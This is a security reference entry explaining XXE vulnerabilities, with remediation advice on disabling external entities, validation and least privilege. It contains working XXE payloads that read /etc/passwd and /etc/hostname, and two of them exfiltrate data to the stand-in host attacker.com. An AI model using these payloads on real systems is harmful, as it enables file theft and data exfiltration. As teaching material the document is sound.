XML External Entity (XXE)

Description

XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to external entities. By manipulating these external entity declarations, attackers can read local files, initiate network requests from the server, or in more severe cases, achieve remote code execution. XXE typically exploits parsing libraries or features in XML processors that automatically retrieve external resources without sufficient validation or restriction.

These attacks are particularly dangerous because XML parsers, by default, may expand entities, download remote content, or even parse system files. If an attacker can control or supply XML data (e.g., via file uploads or API calls), and the server does not securely configure its XML parser, the attacker can exploit XXE to exfiltrate sensitive data or interact with internal services.

Examples

Classic XXE Payload

A typical XXE attack might embed a DOCTYPE declaration that references a system file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure XML parser processes this, it attempts to read /etc/passwd from the server's file system, then includes its content in the parsed output. The attacker can thereby access sensitive local files.

Blind XXE Over HTTP

Attackers can force an XML parser to load an external resource from a remote server they control:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/secret?file=/etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Even if the application's response does not directly return the file contents, the attacker's server receives a request that leaks metadata (like which files exist or open ports) or exfiltrates data, depending on the parser's behavior.

Parameter Entity Injection

Some XML parsers allow parameter entities in the DTD, which can be used to smuggle malicious payloads or access environment variables:

<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?host=%file;'>">
  %eval;
]>
<root>&exfil;</root>

This sequence can initiate network requests containing sensitive server data to an external URL.

Remediation

  1. Disable External Entity Resolution

    • Configure the XML parser to disallow or ignore external entities.
    • For example, in Java, disable DTDs and set XMLConstants.FEATURE_SECURE_PROCESSING to true.
    • Each language or parser typically offers parameters or flags to turn off external entity expansion.

  2. Use Less Complex Data Formats

    • Where possible, avoid using XML and its complex features.
    • Consider JSON or other formats that do not include entity expansion by default, reducing attack surface.

  3. Implement Whitelisting and Validation

    • If external entities are strictly required, configure a whitelist of allowed resources or schemas.
    • Validate XML input against a secure schema that disallows external references.

  4. Enforce Least Privilege and Sandboxing

    • Run the application with minimal file system and network privileges so that even if XXE is attempted, it has limited access to files or internal endpoints.
    • Use containerization or chroot environments to restrict the application's view of the file system.